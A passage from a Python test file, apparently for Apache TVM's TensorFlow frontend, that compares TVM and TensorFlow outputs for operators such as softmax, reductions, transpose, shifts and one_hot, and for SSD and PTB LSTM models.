print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
# Cell inputs 'c and 'h' consist of all layers values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).numpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).numpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
# Create 10 predicted statments of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
"""testing local response normalization"""
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
"""testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_tranapose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
_test_forward_tranapose_axes_input((2, 3, 4), (1, 2, 0))
_test_forward_tranapose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax"""
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square"""
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp"""
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan"""
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1"""
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign"""
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint"""
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg"""
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
